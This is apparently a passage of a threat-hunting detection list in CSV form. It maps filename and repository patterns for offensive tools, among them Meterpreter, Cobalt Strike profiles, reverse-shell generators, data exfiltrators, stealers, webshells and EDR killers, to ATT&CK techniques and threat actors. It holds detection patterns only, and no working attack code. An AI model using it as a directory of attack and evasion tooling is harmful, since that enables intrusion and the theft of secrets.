"*Meterpeter_$RandMe.zip*",".{0,1000}Meterpeter_\$RandMe\.zip.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","51909"
"*meterpreter*.rb*",".{0,1000}meterpreter.{0,1000}\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FIN11 - FIN7 - Silence group - MuddyWater - FIN6 - GCMAN - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","51910"
"*meterpreter.*",".{0,1000}meterpreter\..{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","N/A","10","10","1531","425","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z","51911"
"*Meterpreter.java*",".{0,1000}Meterpreter\.java.{0,1000}","offensive_tool_keyword","Godzilla","Webshell Manager Tool that provide request proxy, server info, RCE shell, terminal execution, memory shell, port forwarding, and MSF bind/reverse shell capabilities.","T1100 - T1018 - T1059 - T1090 - T1021 - T1205 - T1105 - T1568","TA0001 - TA0002 - TA0003 - TA0011","N/A","FIN11 - FIN7 - Silence group - MuddyWater - FIN6 - GCMAN - Turla","C2","https://github.com/BeichenDream/Godzilla","1","1","N/A","N/A","10","10","4096","551","2024-07-17T07:56:35Z","2020-08-17T17:27:56Z","51912"
"*Meterpreter.ps1*",".{0,1000}Meterpreter\.ps1.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","FIN11 - FIN7 - Silence group - MuddyWater - FIN6 - GCMAN - Turla","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","51913"
"*meterpreter.sl*",".{0,1000}meterpreter\.sl.{0,1000}","offensive_tool_keyword","armitage","Armitage is a graphical cyber attack management tool for Metasploit that visualizes your targets. recommends exploits and exposes the advanced capabilities of the framework ","T1210 - T1059.003 - T1547.001 - T1057 - T1046 - T1562.001 - T1071.001 - T1060 - T1573.002","TA0002 - TA0008 - TA0005 - TA0007 - TA0011","N/A","FIN11 - FIN7 - Silence group - MuddyWater - FIN6 - GCMAN - Turla - Black Basta","Exploitation tool","https://github.com/r00t0v3rr1d3/armitage","1","1","N/A","N/A","N/A","2","129","32","2022-12-06T00:17:23Z","2022-01-23T17:32:01Z","51914"
"*meterpreter_*.rb",".{0,1000}meterpreter_.{0,1000}\.rb","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FIN11 - FIN7 - Silence group - MuddyWater - FIN6 - GCMAN - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","51915"
"*meterpreter_loader*",".{0,1000}meterpreter_loader.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","FIN11 - FIN7 - Silence group - MuddyWater - FIN6 - GCMAN - Turla","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","51916"
"*METERPRETER_STAGER*",".{0,1000}METERPRETER_STAGER.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","FIN11 - FIN7 - Silence group - MuddyWater - FIN6 - GCMAN - Turla","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","51917"
"*meterpreter-in-go.exe*",".{0,1000}meterpreter\-in\-go\.exe.{0,1000}","offensive_tool_keyword","EXOCET-AV-Evasion","EXOCET - AV-evading undetectable payload delivery tool","T1055 - T1218.011 - T1027.009 - T1027 - T1105 - T1102.001","TA0005 - TA0001 - TA0002 - TA0009","N/A","FIN11 - FIN7 - Silence group - MuddyWater - FIN6 - GCMAN - Turla","Defense Evasion","https://github.com/tanc7/EXOCET-AV-Evasion","1","1","N/A","N/A","10","9","840","147","2022-08-16T02:58:39Z","2020-07-15T06:55:13Z","51918"
"*MeteTool*",".{0,1000}MeteTool.{0,1000}","offensive_tool_keyword","MeteTool","Metatool Minetest mod provides API for registering metadata manipulation tools and other tools primarily focused on special node data operations.","T1059.003 - T1064 - T1135 - T1059.007","TA0002 - TA0003 - TA0004","N/A","N/A","Defense Evasion","https://github.com/S-S-X/metatool","1","0","N/A","N/A","N/A","1","2","1","2024-07-30T00:22:07Z","2020-05-09T19:09:17Z","51919"
"*methodHash*528465795*",".{0,1000}methodHash.{0,1000}528465795.{0,1000}","offensive_tool_keyword","NixImports","A .NET malware loader using API-Hashing to evade static analysis","T1055.012 - T1562.001 - T1140","TA0005 - TA0003 - TA0040","N/A","N/A","Defense Evasion","https://github.com/dr4k0nia/NixImports","1","0","N/A","N/A","N/A","3","207","23","2023-05-30T14:14:21Z","2023-05-22T18:32:01Z","51920"
"*methods::dns::dns_exfiltrator*",".{0,1000}methods\:\:dns\:\:dns_exfiltrator.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","N/A","10","10","39","6","2025-04-04T18:54:54Z","2023-09-25T20:29:08Z","51921"
"*methods::https::https_exfiltrator*",".{0,1000}methods\:\:https\:\:https_exfiltrator.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","N/A","10","10","39","6","2025-04-04T18:54:54Z","2023-09-25T20:29:08Z","51922"
"*methods::icmp::icmp_exfiltrator*",".{0,1000}methods\:\:icmp\:\:icmp_exfiltrator.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","N/A","10","10","39","6","2025-04-04T18:54:54Z","2023-09-25T20:29:08Z","51923"
"*Metro-Holografix/CSExec*",".{0,1000}Metro\-Holografix\/CSExec.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","1","N/A","private github repo","10","","N/A","","","","51924"
"*Metro-Holografix/Dinjector*",".{0,1000}Metro\-Holografix\/Dinjector.{0,1000}","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/Metro-Holografix/DInjector","1","1","N/A","private github repo","8","","N/A","","","","51925"
"*metsrv.dll*",".{0,1000}metsrv\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","N/A","10","10","1531","425","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z","51926"
"*metsvc-server.exe*",".{0,1000}metsvc\-server\.exe.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","service file name","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","51927"
"*metterpreter*",".{0,1000}metterpreter.{0,1000}","offensive_tool_keyword","metasploit-payloads","shell payload","T1059.001 - T1027 - T1210.001","TA0002 - TA0003 - TA0007","N/A","N/A","Framework","https://github.com/rapid7/metasploit-payloads","1","1","N/A","N/A","10","10","1819","689","2025-02-13T15:01:44Z","2014-04-03T21:18:24Z","51928"
"*mez-0/DecryptRDCManager*",".{0,1000}mez\-0\/DecryptRDCManager.{0,1000}","offensive_tool_keyword","DecryptRDCManager","decrypts passwords stored in Remote Desktop Connection Manager (RDCMan) using DPAPI","T1003 - T1552 - T1081 - T1027","TA0006 - TA0008 - TA0005","N/A","N/A","Credential Access","https://github.com/mez-0/DecryptRDCManager","1","1","N/A","N/A","8","1","73","7","2020-09-29T10:12:58Z","2020-09-29T08:53:46Z","51929"
"*MFASweep.ps1*",".{0,1000}MFASweep\.ps1.{0,1000}","offensive_tool_keyword","MFASweep","A tool for checking if MFA is enabled on multiple Microsoft Services","T1595 - T1595.002 - T1078.003 - T1621","TA0006 - TA0009","N/A","N/A","Exploitation tool","https://github.com/dafthack/MFASweep","1","1","N/A","N/A","9","10","1484","203","2025-03-04T20:36:41Z","2020-09-22T16:25:03Z","51930"
"*mfgccjchihfkkindfppnaooecgfneiii*",".{0,1000}mfgccjchihfkkindfppnaooecgfneiii.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","51931"
"*mgeeky.tech/protectmytooling/*",".{0,1000}mgeeky\.tech\/protectmytooling\/.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","1","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","51932"
"*mgeeky/ElusiveMice*",".{0,1000}mgeeky\/ElusiveMice.{0,1000}","offensive_tool_keyword","ElusiveMice","Cobalt Strike User-Defined Reflective Loader with AV/EDR Evasion in mind","T1620 - T1055.012 - T1202","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/mgeeky/ElusiveMice","1","1","N/A","N/A","10","5","449","78","2023-07-12T17:54:07Z","2021-08-27T19:22:20Z","51933"
"*mgeeky/PackMyPayload*",".{0,1000}mgeeky\/PackMyPayload.{0,1000}","offensive_tool_keyword","PackMyPayload","A PoC that packages payloads into output containers to evade Mark-of-the-Web flag & demonstrate risks associated with container file formats","T1027 - T1036 - T1048 - T1070 - T1096 - T1195","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/mgeeky/PackMyPayload/","1","1","N/A","N/A","10","10","912","143","2024-06-10T09:50:43Z","2022-02-08T19:26:28Z","51934"
"*mgeeky/RedWarden*",".{0,1000}mgeeky\/RedWarden.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","N/A","10","10","964","143","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z","51935"
"*mgeeky@commandoVM*",".{0,1000}mgeeky\@commandoVM.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","51936"
"*mgffkfbidihjpoaomajlbgchddlicgpn*",".{0,1000}mgffkfbidihjpoaomajlbgchddlicgpn.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","51937"
"*mhaskar/DNSStager*",".{0,1000}mhaskar\/DNSStager.{0,1000}","offensive_tool_keyword","DNSStager","DNSStager is an open-source project based on Python used to hide and transfer your payload using DNS.","T1071.004 - T1568.002 - T1102","TA0002 - TA0005 - TA0009 - TA0010","N/A","Black Basta","Defense Evasion","https://github.com/mhaskar/DNSStager","1","1","N/A","N/A","10","7","613","133","2023-05-03T12:25:07Z","2021-04-18T21:58:21Z","51938"
"*mhaskar/Octopus*",".{0,1000}mhaskar\/Octopus.{0,1000}","offensive_tool_keyword","octopus","Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1059.001 - T1105 - T1071.001 - T1219 - T1573","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","1","N/A","N/A","10","10","750","156","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z","51939"
"*mhdehvkomeabau7gsetnsrhkfign4jgnx3wajth5yb5h6kvzbd72wlqd.onion*",".{0,1000}mhdehvkomeabau7gsetnsrhkfign4jgnx3wajth5yb5h6kvzbd72wlqd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51940"
"*mhuzaifi0604/spellbound*",".{0,1000}mhuzaifi0604\/spellbound.{0,1000}","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ","T1105 - T1132 - T1059.003  -  T1094 - T1005","TA0011 - TA0009 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","1","N/A","N/A","10","10","45","5","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z","51942"
"*mhydeath.exe*",".{0,1000}mhydeath\.exe.{0,1000}","offensive_tool_keyword","mhydeath","Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.","T1562.001","TA0040 - TA0005","N/A","Black Basta","Defense Evasion","https://github.com/zer0condition/mhydeath","1","1","N/A","N/A","10","4","397","71","2023-08-22T08:01:04Z","2023-08-22T07:15:36Z","51943"
"*mhydeath-master*",".{0,1000}mhydeath\-master.{0,1000}","offensive_tool_keyword","mhydeath","Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.","T1562.001","TA0040 - TA0005","N/A","Black Basta","Defense Evasion","https://github.com/zer0condition/mhydeath","1","1","N/A","N/A","10","4","397","71","2023-08-22T08:01:04Z","2023-08-22T07:15:36Z","51944"
"*micahvandeusen/gMSADumper*",".{0,1000}micahvandeusen\/gMSADumper.{0,1000}","offensive_tool_keyword","gMSADumper","Lists who can read any gMSA password blobs and parses them if the current user has access.","T1552.001 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/micahvandeusen/gMSADumper","1","1","N/A","N/A","N/A","3","274","51","2024-02-12T02:15:32Z","2021-04-10T00:15:24Z","51945"
"*Micedx765rosoft*",".{0,1000}Micedx765rosoft.{0,1000}","offensive_tool_keyword","LummaC2-Stealer-sample","artifacts from a specific sample of lumma stealer - source code on github","T1204.002 - T1566.001 - T1059.003 - T1027 - T1140 - T1555.003 - T1557.001 - T1083 - T1560.001 - T1041 - T1567 - T1071.001 - T1105 - T1539","TA0006 - TA0010","Lumma Stealer","N/A","Credential Access","https://github.com/x86byte/LummaC2-Stealer","1","0","#content","can be used for yara scans","10","1","31","5","2025-02-18T00:38:59Z","2025-02-15T12:28:05Z","51946"
"*Michael Zhmaylo (github.com/*",".{0,1000}Michael\sZhmaylo\s\(github\.com\/.{0,1000}","offensive_tool_keyword","Parasite-Invoke","Hide your P/Invoke signatures through other people's signed assemblies","T1129 - T1574.002 - T1218","TA0005","N/A","N/A","Defense Evasion","https://github.com/MzHmO/Parasite-Invoke","1","0","N/A","N/A","8","3","207","32","2024-03-10T14:53:59Z","2024-03-07T20:18:42Z","51947"
"*mIcHyAmRaNe/wso-webshell*",".{0,1000}mIcHyAmRaNe\/wso\-webshell.{0,1000}","offensive_tool_keyword","wso-webshell","wso php webshell","T1100 - T1027 - T1059","TA0003 - TA0007","N/A","EMBER BEAR - Sandworm","Persistence","https://github.com/mIcHyAmRaNe/wso-webshell","1","1","N/A","N/A","10","4","376","211","2024-07-08T04:54:36Z","2017-05-04T23:34:02Z","51948"
"*micr0 shell.py*",".{0,1000}micr0\sshell\.py.{0,1000}","offensive_tool_keyword","micr0_shell","micr0shell is a Python script that dynamically generates Windows X64 PIC Null-Free reverse shell shellcode.","T1059.003 - T1027.001","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/senzee1984/micr0_shell","1","1","N/A","N/A","9","2","186","30","2024-07-21T08:16:57Z","2023-08-13T02:46:51Z","51949"
"*micr0_shell-main*",".{0,1000}micr0_shell\-main.{0,1000}","offensive_tool_keyword","micr0_shell","micr0shell is a Python script that dynamically generates Windows X64 PIC Null-Free reverse shell shellcode.","T1059.003 - T1027.001","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/senzee1984/micr0_shell","1","1","N/A","N/A","9","2","186","30","2024-07-21T08:16:57Z","2023-08-13T02:46:51Z","51950"
"*micr0shell.py *",".{0,1000}micr0shell\.py\s.{0,1000}","offensive_tool_keyword","micr0_shell","micr0shell is a Python script that dynamically generates Windows X64 PIC Null-Free reverse shell shellcode.","T1059.003 - T1027.001","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/senzee1984/micr0_shell","1","1","N/A","N/A","9","2","186","30","2024-07-21T08:16:57Z","2023-08-13T02:46:51Z","51951"
"*microbrownys.strangled.net*",".{0,1000}microbrownys\.strangled\.net.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","51952"
"*MicroBurst.psm1*",".{0,1000}MicroBurst\.psm1.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","Scattered Spider*","Exploitation tool","https://github.com/NetSPI/MicroBurst","1","1","N/A","N/A","6","10","2143","320","2025-03-19T17:07:24Z","2018-07-16T16:47:20Z","51953"
"*MicroBurst-Az.psm1*",".{0,1000}MicroBurst\-Az\.psm1.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","Scattered Spider*","Exploitation tool","https://github.com/NetSPI/MicroBurst","1","1","N/A","N/A","6","10","2143","320","2025-03-19T17:07:24Z","2018-07-16T16:47:20Z","51954"
"*MicroBurst-AzureAD*",".{0,1000}MicroBurst\-AzureAD.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","Scattered Spider*","Exploitation tool","https://github.com/NetSPI/MicroBurst","1","1","N/A","N/A","6","10","2143","320","2025-03-19T17:07:24Z","2018-07-16T16:47:20Z","51955"
"*MicroBurst-AzureREST*",".{0,1000}MicroBurst\-AzureREST.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","Scattered Spider*","Exploitation tool","https://github.com/NetSPI/MicroBurst","1","1","N/A","N/A","6","10","2143","320","2025-03-19T17:07:24Z","2018-07-16T16:47:20Z","51956"
"*MicroBurst-AzureRM*",".{0,1000}MicroBurst\-AzureRM.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","Scattered Spider*","Exploitation tool","https://github.com/NetSPI/MicroBurst","1","1","N/A","N/A","6","10","2143","320","2025-03-19T17:07:24Z","2018-07-16T16:47:20Z","51957"
"*MicroBurst-master*",".{0,1000}MicroBurst\-master.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","Scattered Spider*","Exploitation tool","https://github.com/NetSPI/MicroBurst","1","1","N/A","N/A","6","10","2143","320","2025-03-19T17:07:24Z","2018-07-16T16:47:20Z","51958"
"*MicroBurst-Misc.psm1*",".{0,1000}MicroBurst\-Misc\.psm1.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","Scattered Spider*","Exploitation tool","https://github.com/NetSPI/MicroBurst","1","1","N/A","N/A","6","10","2143","320","2025-03-19T17:07:24Z","2018-07-16T16:47:20Z","51959"
